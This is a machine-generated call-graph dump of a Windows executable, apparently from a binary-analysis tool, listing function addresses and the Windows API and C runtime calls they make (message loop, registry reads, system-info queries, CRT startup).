9b87c0 69 API calls 99853->99991 100005 a159de 69 API calls 99853->100005 100006 9b9e9c 61 API calls Mailbox 99853->100006 99854->99853 99889 9c02c2 99854->99889 99992 9b9df0 60 API calls Mailbox 99854->99992 99855->99851 99856->99874 99912 9c0b30 99856->99912 99857 9ba000 256 API calls 99859 9f4de0 99857->99859 99861 9b8620 70 API calls 99859->99861 99859->99869 99860->99853 99861->99867 99863->99853 99997 a19ed4 90 API calls 4 library calls 99864->99997 99866 9c0112 99866->99837 99868 9c0146 99866->99868 99866->99874 100007 a19ed4 90 API calls 4 library calls 99867->100007 99873 9b81a7 60 API calls 99868->99873 99876 9c0167 99868->99876 99873->99876 99993 a19ed4 90 API calls 4 library calls 99874->99993 99875->99762 99876->99874 99878 9f4e7d 99876->99878 99880 9c01ac 99876->99880 99877->99853 100009 9b9e9c 61 API calls Mailbox 99878->100009 99880->99819 99880->99874 99881 9c0238 99880->99881 99989 9b9e9c 61 API calls Mailbox 99881->99989 99885 9d0f36 Mailbox 60 API calls 99883->99885 99884 9c024b 99884->99874 99990 9b843f 60 API calls Mailbox 99884->99990 99885->99888 99888->99857 99889->99762 99890->99760 99891->99763 99892->99767 99893->99803 99894->99806 99895->99802 99897 9b82ef 99896->99897 99900 9b830a 99896->99900 99898 9b7faf 60 API calls 99897->99898 99899 9b82f7 CharUpperBuffW 99898->99899 99899->99900 99900->99812 99902 9bf3b1 99901->99902 99903 9bf3d2 99902->99903 100011 a19ed4 90 API calls 4 library calls 99902->100011 99903->99851 99906 9b84ed 99905->99906 99907 9ef116 99905->99907 99908 9d0f36 Mailbox 60 API calls 99906->99908 99909 9b84f4 99908->99909 99910 9b8515 99909->99910 100012 9b8794 60 API calls Mailbox 99909->100012 99910->99830 99910->99839 99913 9f501c 99912->99913 99927 9c0b55 99912->99927 100055 a19ed4 90 API calls 4 library calls 99913->100055 99915 9c0e5a 99915->99866 99917 9c1044 99917->99915 99919 9c1051 99917->99919 100053 9c11f3 256 API calls Mailbox 99919->100053 99920 9c0bab PeekMessageW 99988 9c0b65 Mailbox 99920->99988 99922 9c1058 LockWindowUpdate DestroyWindow GetMessageW 99922->99915 99925 9c108a 99922->99925 99924 9f51da Sleep 99924->99988 99928 9f5fb1 TranslateMessage DispatchMessageW GetMessageW 99925->99928 99926 9c0e44 99926->99915 100052 9c11d0 10 API calls Mailbox 99926->100052 99927->99988 100056 9b9fbd 61 API calls 99927->100056 100057 a0669f 256 API calls 99927->100057 99928->99928 99930 9f5fe1 99928->99930 99930->99915 99931 9c1005 TranslateMessage DispatchMessageW 99932 9c0fa3 PeekMessageW 99931->99932 99932->99988 99933 9f50a9 TranslateAcceleratorW 99933->99932 99933->99988 99934 9b9fbd 61 API calls 99934->99988 99935 9c0e73 timeGetTime 99935->99988 99936 9f5b78 WaitForSingleObject 99938 9f5b95 GetExitCodeProcess CloseHandle 99936->99938 99936->99988 99973 9c10f5 99938->99973 99939 9c0fbf Sleep 99974 9c0fd0 Mailbox 99939->99974 99940 9b81a7 60 API calls 99940->99988 99941 9b77c7 60 API calls 99941->99974 99942 9f5e51 Sleep 99942->99974 99944 9d0f36 60 API calls Mailbox 99944->99988 99945 9bb89c 229 API calls 99945->99988 99947 9d034a timeGetTime 99947->99974 99948 9c10ae timeGetTime 100054 9b9fbd 61 API calls 99948->100054 99951 9f5ee8 GetExitCodeProcess 99955 9f5efe WaitForSingleObject 99951->99955 99956 9f5f14 CloseHandle 99951->99956 99952 9b9997 85 API calls 99952->99988 99953 a35f8e 111 API calls 99953->99974 99954 9bb93d 110 API calls 99954->99974 99955->99956 99955->99988 99956->99974 99959 9f5bcd 99959->99973 99960 9f53d1 Sleep 99960->99988 99961 9f5f70 Sleep 99961->99988 99963 9b7f41 60 API calls 99963->99974 99967 9ba000 229 API calls 99967->99988 99968 9b8b13 70 API calls 99968->99974 99969 9bf5c0 229 API calls 99969->99988 99970 9bfe40 229 API calls 99970->99988 99973->99866 99974->99941 99974->99947 99974->99951 99974->99953 99974->99954 99974->99959 99974->99960 99974->99961 99974->99963 99974->99968 99974->99973 99974->99988 100064 a12700 61 API calls 99974->100064 100065 9b9fbd 61 API calls 99974->100065 100066 9bb89c 256 API calls 99974->100066 100067 a06830 61 API calls 99974->100067 100068 a152eb QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 99974->100068 100069 a13c99 67 API calls Mailbox 99974->100069 99975 a19ed4 90 API calls 99975->99988 99976 9b8620 70 API calls 99976->99988 99978 9b9df0 60 API calls Mailbox 99978->99988 99979 a063f2 60 API calls Mailbox 99979->99988 99981 9b7f41 60 API calls 99981->99988 99982 9b8b13 70 API calls 99982->99988 99983 9f592e VariantClear 99983->99988 99984 a071e5 60 API calls 99984->99988 99985 9f59c4 VariantClear 99985->99988 99986 9f5772 VariantClear 99986->99988 99987 9b8e34 60 API calls Mailbox 99987->99988 99988->99920 99988->99924 99988->99926 99988->99931 99988->99932 99988->99933 99988->99934 99988->99935 99988->99936 99988->99939 99988->99940 99988->99942 99988->99944 99988->99945 99988->99948 99988->99952 99988->99967 99988->99969 99988->99970 99988->99973 99988->99974 99988->99975 99988->99976 99988->99978 99988->99979 99988->99981 99988->99982 99988->99983 99988->99984 99988->99985 99988->99986 99988->99987 100013 9be580 99988->100013 100020 9be800 99988->100020 100051 9b31ce IsDialogMessageW GetClassLongW 99988->100051 100058 a36081 60 API calls 99988->100058 100059 a19abe 60 API calls Mailbox 99988->100059 100060 a0d801 60 API calls 99988->100060 100061 a06363 60 API calls 2 library calls 99988->100061 100062 9b8561 60 API calls 99988->100062 100063 9b843f 60 API calls Mailbox 99988->100063 99989->99884 99990->99854 99991->99853 99992->99854 99993->99813 99994->99869 99995->99821 99996->99869 99997->99869 99998->99828 99999->99840 100000->99835 100001->99835 100002->99838 100003->99842 100004->99853 100005->99853 100006->99853 100007->99869 100008->99868 100009->99819 100010->99869 100011->99903 100012->99910 100014 9be59d 100013->100014 100015 9be5b1 100013->100015 100070 9be060 256 API calls 2 library calls 100014->100070 100071 a19ed4 90 API calls 4 library calls 100015->100071 100017 9be5a8 100017->99988 100019 9f3dfd 100019->100019 100021 9be835 100020->100021 100022 9f3e02 100021->100022 100024 9be89f 100021->100024 100035 9be8f9 100021->100035 100023 9ba000 256 API calls 100022->100023 100025 9f3e17 100023->100025 100027 9b77c7 60 API calls 100024->100027 100024->100035 100050 9bead0 Mailbox 100025->100050 100073 a19ed4 90 API calls 4 library calls 100025->100073 100026 9b77c7 60 API calls 100026->100035 100029 9f3e5d 100027->100029 100031 9d2ec0 __cinit 68 API calls 100029->100031 100030 9d2ec0 __cinit 68 API calls 100030->100035 100031->100035 100032 9f3e7f 100032->99988 100033 9b8620 70 API calls 100033->100050 100034 9ba000 256 API calls 100034->100050 100035->100026 100035->100030 100035->100032 100037 9beaba 100035->100037 100035->100050 100037->100050 100074 a19ed4 90 API calls 4 library calls 100037->100074 100038 9bf2fc 100078 a19ed4 90 API calls 4 library calls 100038->100078 100042 9b8ea0 60 API calls 100042->100050 100043 9f417e 100043->99988 100047 a19ed4 90 API calls 100047->100050 100049 9bebd8 100049->99988 100050->100033 100050->100034 100050->100038 100050->100042 100050->100047 100050->100049 100072 9b80d7 60 API calls 2 library calls 100050->100072 100075 a071e5 60 API calls 100050->100075 100076 a2c6d7 256 API calls 100050->100076 100077 a2b651 256 API calls Mailbox 100050->100077 100079 9b9df0 60 API calls Mailbox 100050->100079 100080 a294db 256 API calls Mailbox 100050->100080 100051->99988 100052->99917 100053->99922 100054->99988 100055->99927 100056->99927 100057->99927 100058->99988 100059->99988 100060->99988 100061->99988 100062->99988 100063->99988 100064->99974 100065->99974 100066->99974 100067->99974 100068->99974 100069->99974 100070->100017 100071->100019 100072->100050 100073->100050 100074->100050 100075->100050 100076->100050 100077->100050 100078->100043 100079->100050 100080->100050 100081 9b1016 100086 9b4ad2 100081->100086 100084 9d2ec0 __cinit 68 API calls 100085 9b1025 100084->100085 100087 9d0f36 Mailbox 60 API calls 100086->100087 100088 9b4ada 100087->100088 100089 9b101b 100088->100089 100093 9b4a94 100088->100093 100089->100084 100094 9b4a9d 100093->100094 100095 9b4aaf 100093->100095 100096 9d2ec0 __cinit 68 API calls 100094->100096 100097 9b4afe 100095->100097 100096->100095 100098 9b77c7 60 API calls 100097->100098 100099 9b4b16 GetVersionExW 100098->100099 100100 9b7d2c 60 API calls 100099->100100 100101 9b4b59 100100->100101 100102 9b7e8c 60 API calls 100101->100102 100108 9b4b86 100101->100108 100103 9b4b7a 100102->100103 100104 9b7886 60 API calls 100103->100104 100104->100108 100105 9edbbd 100106 9b4bf1 GetCurrentProcess IsWow64Process 100107 9b4c0a 100106->100107 100109 9b4c89 GetSystemInfo 100107->100109 100110 9b4c20 100107->100110 100108->100105 100108->100106 100111 9b4c56 100109->100111 100121 9b4c95 100110->100121 100111->100089 100114 9b4c7d GetSystemInfo 100116 9b4c47 100114->100116 100115 9b4c32 100117 9b4c95 2 API calls 100115->100117 100116->100111 100119 9b4c4d FreeLibrary 100116->100119 100118 9b4c3a GetNativeSystemInfo 100117->100118 100118->100116 100119->100111 100122 9b4c2e 100121->100122 100123 9b4c9e LoadLibraryA 100121->100123 100122->100114 100122->100115 100123->100122 100124 9b4caf GetProcAddress 100123->100124 100124->100122 100125 9b1066 100130 9bf8cf 100125->100130 100127 9b106c 100128 9d2ec0 __cinit 68 API calls 100127->100128 100129 9b1076 100128->100129 100131 9bf8f0 100130->100131 100163 9d0083 100131->100163 100135 9bf937 100136 9b77c7 60 API calls 100135->100136 100137 9bf941 100136->100137 100138 9b77c7 60 API calls 100137->100138 100139 9bf94b 100138->100139 100140 9b77c7 60 API calls 100139->100140 100141 9bf955 100140->100141 100142 9b77c7 60 API calls 100141->100142 100143 9bf993 100142->100143 100144 9b77c7 60 API calls 100143->100144 100145 9bfa5e 100144->100145 100173 9c60e7 100145->100173 100149 9bfa90 100150 9b77c7 60 API calls 100149->100150 100151 9bfa9a 100150->100151 100201 9cff1e 100151->100201 100153 9bfae1 100154 9bfaf1 GetStdHandle 100153->100154 100155 9bfb3d 100154->100155 100156 9f4904 100154->100156 100157 9bfb45 OleInitialize 100155->100157 100156->100155 100158 9f490d 100156->100158 100157->100127 100208 a16be1 65 API calls Mailbox 100158->100208 100160 9f4914 100209 a172b0 CreateThread 100160->100209 100162 9f4920 CloseHandle 100162->100157 100210 9d015c 100163->100210 100166 9d015c 60 API calls 100167 9d00c5 100166->100167 100168 9b77c7 60 API calls 100167->100168 100169 9d00d1 100168->100169 100170 9b7d2c 60 API calls 100169->100170 100171 9bf8f6 100170->100171 100172 9d02e2 6 API calls 100171->100172 100172->100135 100174 9b77c7 60 API calls 100173->100174 100175 9c60f7 100174->100175 100176 9b77c7 60 API calls 100175->100176 100177 9c60ff 100176->100177 100217 9c5bfd 100177->100217 100180 9c5bfd 60 API calls 100181 9c610f 100180->100181 100182 9b77c7 60 API calls 100181->100182 100183 9c611a 100182->100183 100184 9d0f36 Mailbox 60 API calls 100183->100184 100185 9bfa68 100184->100185 100186 9c6259 100185->100186 100187 9c6267 100186->100187 100188 9b77c7 60 API calls 100187->100188 100189 9c6272 100188->100189 100190 9b77c7 60 API calls 100189->100190 100191 9c627d 100190->100191 100192 9b77c7 60 API calls 100191->100192 100193 9c6288 100192->100193 100194 9b77c7 60 API calls 100193->100194 100195 9c6293 100194->100195 100196 9c5bfd 60 API calls 100195->100196 100197 9c629e 100196->100197 100198 9d0f36 Mailbox 60 API calls 100197->100198 100199 9c62a5 RegisterWindowMessageW 100198->100199 100199->100149 100202 9cff2e 100201->100202 100203 a05ac5 100201->100203 100204 9d0f36 Mailbox 60 API calls 100202->100204 100220 a19b90 61 API calls 100203->100220 100206 9cff36 100204->100206 100206->100153 100207 a05ad0 100208->100160 100209->100162 100221 a17296 66 API calls 100209->100221 100211 9b77c7 60 API calls 100210->100211 100212 9d0167 100211->100212 100213 9b77c7 60 API calls 100212->100213 100214 9d016f 100213->100214 100215 9b77c7 60 API calls 100214->100215 100216 9d00bb 100215->100216 100216->100166 100218 9b77c7 60 API calls 100217->100218 100219 9c5c05 100218->100219 100219->100180 100220->100207 100222 9b1055 100227 9b2649 100222->100227 100225 9d2ec0 __cinit 68 API calls 100226 9b1064 100225->100226 100228 9b77c7 60 API calls 100227->100228 100229 9b26b7 100228->100229 100234 9b3582 100229->100234 100232 9b2754 100233 9b105a 100232->100233 100237 9b3416 100232->100237 100233->100225 100243 9b35b0 100234->100243 100239 9b344e 100237->100239 100242 9b3428 _memmove 100237->100242 100238 9d0f36 Mailbox 60 API calls 100240 9b342e 100238->100240 100241 9d0f36 Mailbox 60 API calls 100239->100241 100240->100232 100241->100242 100242->100238 100244 9b35a1 100243->100244 100245 9b35bd 100243->100245 100244->100232 100245->100244 100246 9b35c4 RegOpenKeyExW 100245->100246 100246->100244 100247 9b35de RegQueryValueExW 100246->100247 100248 9b35ff 100247->100248 100249 9b3614 RegCloseKey 100247->100249 100248->100249 100249->100244 100250 9d7dd3 100251 9d7ddf _wprintf 100250->100251 100287 9d9f88 GetStartupInfoW 100251->100287 100253 9d7de4 100289 9d8cfc GetProcessHeap 100253->100289 100255 9d7e3c 100256 9d7e47 100255->100256 100372 9d7f23 59 API calls 3 library calls 100255->100372 100290 9d9c66 100256->100290 100259 9d7e4d 100260 9d7e58 __RTC_Initialize 100259->100260 100373 9d7f23 59 API calls 3 library calls 100259->100373 100311 9dd752 100260->100311 100263 9d7e67 100264 9d7e73 GetCommandLineW 100263->100264 100374 9d7f23 59 API calls 3 library calls 100263->100374 100330 9e50a3 GetEnvironmentStringsW 100264->100330 100267 9d7e72 100267->100264 100270 9d7e8d 100271 9d7e98 100270->100271 100375 9d3235 59 API calls 3 library calls 100270->100375 100340 9e4ed8 100271->100340 100274 9d7e9e 100275 9d7ea9 100274->100275 100376 9d3235 59 API calls 3 library calls 100274->100376 100354 9d326f 100275->100354 100278 9d7eb1 100279 9d7ebc __wwincmdln 100278->100279 100377 9d3235 59 API calls 3 library calls 100278->100377 100360 9b492e 100279->100360 100282 9d7ed0 100283 9d7edf 100282->100283 100378 9d34d8 59 API calls _doexit 100282->100378 100379 9d3260 59 API calls _doexit 100283->100379 100286 9d7ee4 _wprintf 100288 9d9f9e 100287->100288 100288->100253 100289->100255 100380 9d3307 RtlEncodePointer 100290->100380 100292 9d9c6b 100386 9d9ebc 100292->100386 100295 9d9c74 100390 9d9cdc 62 API calls 2 library calls 100295->100390 100298 9d9c79 100298->100259 100299 9d9c86 100299->100295 100300 9d9c91 100299->100300 100392 9d8955 100300->100392 100302 9d9c9e 100303 9d9cd3 100302->100303 100398 9d9f66 TlsSetValue 100302->100398 100400 9d9cdc 62 API calls 2 library calls 100303->100400 100306 9d9cb2 100306->100303 100308 9d9cb8 100306->100308 100307 9d9cd8 100307->100259 100399 9d9bb3 59 API calls 4 library calls 100308->100399 100310 9d9cc0 GetCurrentThreadId 100310->100259 100312 9dd75e _wprintf 100311->100312 100313 9d9d8b __lock 59 API calls 100312->100313 100314 9dd765 100313->100314 100315 9d8955 __calloc_crt 59 API calls 100314->100315 100317 9dd776 100315->100317 100316 9dd7e1 GetStartupInfoW 100324 9dd7f6 100316->100324 100325 9dd925 100316->100325 100317->100316 100318 9dd781 _wprintf @_EH4_CallFilterFunc@8 100317->100318 100318->100263 100319 9dd9ed 100414 9dd9fd LeaveCriticalSection _doexit 100319->100414 100321 9d8955 __calloc_crt 59 API calls 100321->100324 100322 9dd972 GetStdHandle 100322->100325 100323 9dd985 GetFileType 100323->100325 100324->100321 100324->100325 100327 9dd844 100324->100327 100325->100319 100325->100322 100325->100323 100329 9d9fab __alloc_osfhnd 2 API calls 100325->100329 100326 9dd878 GetFileType 100326->100327 100327->100325 100327->100326 100328 9d9fab __alloc_osfhnd 2 API calls 100327->100328 100328->100327 100329->100325 100331 9d7e83 100330->100331 100332 9e50b4 100330->100332 100336 9e4c9b GetModuleFileNameW 100331->100336 100415 9d899d 59 API calls 2 library calls 100332->100415 100334 9e50da _memmove 100335 9e50f0 FreeEnvironmentStringsW 100334->100335 100335->100331 100337 9e4ccf _wparse_cmdline 100336->100337 100339 9e4d0f _wparse_cmdline 100337->100339 100416 9d899d 59 API calls 2 library calls 100337->100416 100339->100270 100341 9e4ee9 100340->100341 100342 9e4ef1 __NMSG_WRITE 100340->100342 100341->100274 100343 9d8955 __calloc_crt 59 API calls 100342->100343 100346 9e4f1a __NMSG_WRITE 100343->100346 100344 9e4f71 100345 9d2ed5 _free 59 API calls 100344->100345 100345->100341 100346->100341 100346->100344 100347 9d8955 __calloc_crt 59 API calls 100346->100347 100348 9e4f96 100346->100348 100351 9e4fad 100346->100351 100417 9e4787 59 API calls ___crtsetenv 100346->100417 100347->100346 100350 9d2ed5 _free 59 API calls 100348->100350 100350->100341 100418 9d8f46 IsProcessorFeaturePresent 100351->100418 100353 9e4fb9 100353->100274 100356 9d327b __IsNonwritableInCurrentImage 100354->100356 100441 9da651 100356->100441 100357 9d3299 __initterm_e 100358 9d2ec0 __cinit 68 API calls 100357->100358 100359 9d32b8 _doexit __IsNonwritableInCurrentImage 100357->100359 100358->100359 100359->100278 100361 9b4948 100360->100361 100371 9b49e7 100360->100371 100362 9b4982 IsThemeActive 100361->100362 100444 9d34ec 100362->100444 100366 9b49ae 100456 9b4a5b SystemParametersInfoW SystemParametersInfoW 100366->100456 100368 9b49ba 100457 9b3b4c 100368->100457 100370 9b49c2 SystemParametersInfoW 100370->100371 100371->100282 100372->100256 100373->100260 100374->100267 100378->100283 100379->100286 100401 9d3547 100380->100401 100382 9d3318 __init_pointers __initp_misc_winsig 100402 9da6a4 EncodePointer 100382->100402 100384 9d3330 __init_pointers 100385 9da019 34 API calls 100384->100385 100385->100292 100387 9d9ec8 100386->100387 100388 9d9c70 100387->100388 100389 9d9fab __alloc_osfhnd 2 API calls 100387->100389 100388->100295 100391 9d9f0a TlsAlloc 100388->100391 100389->100387 100390->100298 100391->100299 100394 9d895c 100392->100394 100395 9d8997 100394->100395 100397 9d897a 100394->100397 100403 9e5376 100394->100403 100395->100302 100397->100394 100397->100395 100411 9da2b2 Sleep 100397->100411 100398->100306 100399->100310 100400->100307 100401->100382 100402->100384 100404 9e5381 100403->100404 100408 9e539c 100403->100408 100405 9e538d 100404->100405 100404->100408 100412 9d8ca8 59 API calls __getptd_noexit 100405->100412 100406 9e53ac HeapAlloc 100406->100408 100409 9e5392 100406->100409 100408->100406 100408->100409 100413 9d3521 DecodePointer 100408->100413 100409->100394 100411->100397 100412->100409 100413->100408 100414->100318 100415->100334 100416->100339 100417->100346 100419 9d8f51 100418->100419 100424 9d8dd9 100419->100424 100423 9d8f6c 100423->100353 100425 9d8df3 _memset ___raise_securityfailure 100424->100425 100426 9d8e13 IsDebuggerPresent 100425->100426 100432 9da2d5 SetUnhandledExceptionFilter UnhandledExceptionFilter 100426->100432 100429 9d8efa 100431 9da2c0 GetCurrentProcess TerminateProcess 100429->100431 100430 9d8ed7 ___raise_securityfailure 100433 9dc776 100430->100433 100431->100423 100432->100430 100434 9dc77e 100433->100434 100435 9dc780 IsProcessorFeaturePresent 100433->100435 100434->100429 100437 9e5a8a 100435->100437 100440 9e5a39 5 API calls ___raise_securityfailure 100437->100440 100439 9e5b6d 100439->100429 100440->100439 100442 9da654 EncodePointer 100441->100442 100442->100442 100443 9da66e 100442->100443 100443->100357 100445 9d9d8b __lock 59 API calls 100444->100445 100446 9d34f7 DecodePointer EncodePointer 100445->100446 100509 9d9ef5 LeaveCriticalSection 100446->100509 100448 9b49a7 100449 9d3554 100448->100449 100450 9d355e 100449->100450 100451 9d3578 100449->100451 100450->100451 100510 9d8ca8 59 API calls __getptd_noexit 100450->100510 100451->100366 100453 9d3568 100511 9d8f36 9 API calls ___crtsetenv 100453->100511 100455 9d3573 100455->100366 100456->100368 100458 9b3b59 __ftell_nolock 100457->100458 100459 9b77c7 60 API calls 100458->100459 100460 9b3b63 GetCurrentDirectoryW 100459->100460 100512 9b3778 100460->100512 100462 9b3b8c IsDebuggerPresent 100463 9b3b9a 100462->100463 100464 9ed3dd MessageBoxA 100462->100464 100465 9b3c73 100463->100465 100467 9ed3f7 100463->100467 100468 9b3bb7 100463->100468 100464->100467 100466 9b3c7a SetCurrentDirectoryW 100465->100466 100469 9b3c87 Mailbox 100466->100469 100635 9b7373 60 API calls Mailbox 100467->100635 100593 9b73e5 100468->100593 100469->100370 100473 9ed407 100477 9ed41d SetCurrentDirectoryW 100473->100477 100474 9b3bd5 GetFullPathNameW 100475 9b7d2c 60 API calls 100474->100475 100476 9b3c10 100475->100476 100609 9c0a8d 100476->100609 100477->100469 100509->100448 100510->100453 100511->100455 100513 9b77c7 60 API calls 100512->100513 100514 9b378e 100513->100514 100637 9b3d43 100514->100637 100516 9b37ac 100517 9b4864 62 API calls 100516->100517 100518 9b37c0 100517->100518 100519 9b7f41 60 API calls 100518->100519 100520 9b37cd 100519->100520 100651 9b4f3d 100520->100651 100523 9ed2de 100703 a19604 100523->100703 100524 9b37ee Mailbox 100528 9b81a7 60 API calls 100524->100528 100527 9ed2fd 100531 9d2ed5 _free 59 API calls 100527->100531 100529 9b3801 100528->100529 100675 9b93ea 100529->100675 100532 9ed30a 100531->100532 100534 9b4faa 85 API calls 100532->100534 100536 9ed313 100534->100536 100540 9b3ee2 60 API calls 100536->100540 100537 9b7f41 60 API calls 100538 9b381a 100537->100538 100539 9b8620 70 API calls 100538->100539 100541 9b382c Mailbox 100539->100541 100542 9ed32e 100540->100542 100543 9b7f41 60 API calls 100541->100543 100544 9b3ee2 60 API calls 100542->100544 100545 9b3852 100543->100545 100546 9ed34a 100544->100546 100547 9b8620 70 API calls 100545->100547 100548 9b4864 62 API calls 100546->100548 100550 9b3861 Mailbox 100547->100550 100549 9ed36f 100548->100549 100551 9b3ee2 60 API calls 100549->100551 100553 9b77c7 60 API calls 100550->100553 100552 9ed37b 100551->100552 100554 9b81a7 60 API calls 100552->100554 100555 9b387f 100553->100555 100556 9ed389 100554->100556 100678 9b3ee2 100555->100678 100558 9b3ee2 60 API calls 100556->100558 100560 9ed398 100558->100560 100566 9b81a7 60 API calls 100560->100566 100562 9b3899 100562->100536 100563 9b38a3 100562->100563 100564 9d307d _W_store_winword 61 API calls 100563->100564 100565 9b38ae 100564->100565 100565->100542 100567 9b38b8 100565->100567 100568 9ed3ba 100566->100568 100569 9d307d _W_store_winword 61 API calls 100567->100569 100570 9b3ee2 60 API calls 100568->100570 100571 9b38c3 100569->100571 100572 9ed3c7 100570->100572 100571->100546 100573 9b38cd 100571->100573 100572->100572 100574 9d307d _W_store_winword 61 API calls 100573->100574 100575 9b38d8 100574->100575 100575->100560 100576 9b3919 100575->100576 100578 9b3ee2 60 API calls 100575->100578 100576->100560 100577 9b3926 100576->100577 100580 9b942e 60 API calls 100577->100580 100579 9b38fc 100578->100579 100581 9b81a7 60 API calls 100579->100581 100582 9b3936 100580->100582 100583 9b390a 100581->100583 100584 9b91b0 60 API calls 100582->100584 100585 9b3ee2 60 API calls 100583->100585 100586 9b3944 100584->100586 100585->100576 100694 9b9040 100586->100694 100588 9b3961 100589 9b93ea 60 API calls 100588->100589 100590 9b9040 61 API calls 100588->100590 100591 9b3ee2 60 API calls 100588->100591 100592 9b39a7 Mailbox 100588->100592 100589->100588 100590->100588 100591->100588 100592->100462 100594 9b73f2 __ftell_nolock 100593->100594 100595 9b740b 100594->100595 100596 9eed7b _memset 100594->100596 100597 9b48ae 61 API calls 100595->100597 100598 9eed97 GetOpenFileNameW 100596->100598 100599 9b7414 100597->100599 100600 9eede6 100598->100600 101224 9d0911 100599->101224 100602 9b7d2c 60 API calls 100600->100602 100604 9eedfb 100602->100604 100604->100604 100606 9b7429 101242 9b69ca 100606->101242 100635->100473 100638 9b3d50 __ftell_nolock 100637->100638 100639 9b7d2c 60 API calls 100638->100639 100642 9b3eb6 Mailbox 100638->100642 100640 9b3d82 100639->100640 100649 9b3db8 Mailbox 100640->100649 100744 9b7b52 100640->100744 100642->100516 100643 9b3e89 100643->100642 100644 9b7f41 60 API calls 100643->100644 100646 9b3eaa 100644->100646 100645 9b7f41 60 API calls 100645->100649 100647 9b3f84 60 API calls 100646->100647 100647->100642 100648 9b3f84 60 API calls 100648->100649 100649->100642 100649->100643 100649->100645 100649->100648 100650 9b7b52 60 API calls 100649->100650 100650->100649 100747 9b4d13 100651->100747 100656 9edc3f 100659 9b4faa 85 API calls 100656->100659 100657 9b4f68 LoadLibraryExW 100757 9b4cc8 100657->100757 100661 9edc46 100659->100661 100663 9b4cc8 3 API calls 100661->100663 100665 9edc4e 100663->100665 100664 9b4f8f 100664->100665 100666 9b4f9b 100664->100666 100783 9b506b 100665->100783 100668 9b4faa 85 API calls 100666->100668 100670 9b37e6 100668->100670 100670->100523 100670->100524 100672 9edc75 100791 9b5027 100672->100791 100674 9edc82 100676 9d0f36 Mailbox 60 API calls 100675->100676 100677 9b380d 100676->100677 100677->100537 100679 9b3eec 100678->100679 100680 9b3f05 100678->100680 100681 9b81a7 60 API calls 100679->100681 100682 9b7d2c 60 API calls 100680->100682 100683 9b388b 100681->100683 100682->100683 100684 9d307d 100683->100684 100685 9d30fe 100684->100685 100686 9d3089 100684->100686 101043 9d3110 61 API calls 3 library calls 100685->101043 100693 9d30ae 100686->100693 101041 9d8ca8 59 API calls __getptd_noexit 100686->101041 100689 9d310b 100689->100562 100690 9d3095 101042 9d8f36 9 API calls ___crtsetenv 100690->101042 100692 9d30a0 100692->100562 100693->100562 100695 9ef4d5 100694->100695 100697 9b9057 100694->100697 100695->100697 101045 9b8d3b 60 API calls Mailbox 100695->101045 100698 9b915f 100697->100698 100699 9b9158 100697->100699 100700 9b91a0 100697->100700 100698->100588 100702 9d0f36 Mailbox 60 API calls 100699->100702 101044 9b9e9c 61 API calls Mailbox 100700->101044 100702->100698 100704 9b5045 86 API calls 100703->100704 100705 a19673 100704->100705 101046 a197dd 100705->101046 100708 9b506b 75 API calls 100709 a196a0 100708->100709 100710 9b506b 75 API calls 100709->100710 100711 a196b0 100710->100711 100712 9b506b 75 API calls 100711->100712 100713 a196cb 100712->100713 100714 9b506b 75 API calls 100713->100714 100715 a196e6 100714->100715 100716 9b5045 86 API calls 100715->100716 100717 a196fd 100716->100717 100718 9d588c _W_store_winword 59 API calls 100717->100718 100719 a19704 100718->100719 100720 9d588c _W_store_winword 59 API calls 100719->100720 100721 a1970e 100720->100721 100722 9b506b 75 API calls 100721->100722 100723 a19722 100722->100723 100724 a191b2 GetSystemTimeAsFileTime 100723->100724 100725 a19735 100724->100725 100726 a1974a 100725->100726 100727 a1975f 100725->100727 100728 9d2ed5 _free 59 API calls 100726->100728 100729 a19765 100727->100729 100730 a197c4 100727->100730 100731 a19750 100728->100731 101052 a18baf 100729->101052 100733 9d2ed5 _free 59 API calls 100730->100733 100734 9d2ed5 _free 59 API calls 100731->100734 100736 9ed2f1 100733->100736 100734->100736 100736->100527 100738 9b4faa 100736->100738 100737 9d2ed5 _free 59 API calls 100737->100736 100739 9b4fb4 100738->100739 100741 9b4fbb 100738->100741 100740 9d5516 __fcloseall 84 API calls 100739->100740 100740->100741 100742 9b4fdb FreeLibrary 100741->100742 100743 9b4fca 100741->100743 100742->100743 100743->100527 100745 9b7faf 60 API calls 100744->100745 100746 9b7b5d 100745->100746 100746->100640 100796 9b4d61 100747->100796 100750 9b4d4a FreeLibrary 100751 9b4d53 100750->100751 100754 9d53cb 100751->100754 100752 9b4d61 2 API calls 100753 9b4d3a 100752->100753 100753->100750 100753->100751 100800 9d53e0 100754->100800 100756 9b4f5c 100756->100656 100756->100657 100959 9b4d94 100757->100959 100760 9b4ced 100762 9b4d08 100760->100762 100763 9b4cff FreeLibrary 100760->100763 100761 9b4d94 2 API calls 100761->100760 100764 9b4dd0 100762->100764 100763->100762 100765 9d0f36 Mailbox 60 API calls 100764->100765 100766 9b4de5 100765->100766 100767 9b538e 60 API calls 100766->100767 100768 9b4df1 _memmove 100767->100768 100769 9b4e2c 100768->100769 100771 9b4ee9 100768->100771 100772 9b4f21 100768->100772 100770 9b5027 70 API calls 100769->100770 100775 9b4e35 100770->100775 100963 9b4fe9 CreateStreamOnHGlobal 100771->100963 100974 a199c4 96 API calls 100772->100974 100776 9b506b 75 API calls 100775->100776 100777 9b4ec9 100775->100777 100779 9edc00 100775->100779 100969 9b5045 100775->100969 100776->100775 100777->100664 100780 9b5045 86 API calls 100779->100780 100781 9edc14 100780->100781 100782 9b506b 75 API calls 100781->100782 100782->100777 100784 9b507d 100783->100784 100785 9edd26 100783->100785 100998 9d5752 100784->100998 100788 a191b2 101018 a19008 100788->101018 100790 a191c8 100790->100672 100792 9b5036 100791->100792 100795 9edce9 100791->100795 101023 9d5dd0 100792->101023 100794 9b503e 100794->100674 100797 9b4d2e 100796->100797 100798 9b4d6a LoadLibraryA 100796->100798 100797->100752 100797->100753 100798->100797 100799 9b4d7b GetProcAddress 100798->100799 100799->100797 100803 9d53ec _wprintf 100800->100803 100801 9d53ff 100849 9d8ca8 59 API calls __getptd_noexit 100801->100849 100803->100801 100805 9d5430 100803->100805 100804 9d5404 100850 9d8f36 9 API calls ___crtsetenv 100804->100850 100819 9e0668 100805->100819 100808 9d5435 100809 9d543e 100808->100809 100810 9d544b 100808->100810 100851 9d8ca8 59 API calls __getptd_noexit 100809->100851 100812 9d5475 100810->100812 100813 9d5455 100810->100813 100834 9e0787 100812->100834 100852 9d8ca8 59 API calls __getptd_noexit 100813->100852 100814 9d540f _wprintf @_EH4_CallFilterFunc@8 100814->100756 100820 9e0674 _wprintf 100819->100820 100821 9d9d8b __lock 59 API calls 100820->100821 100827 9e0682 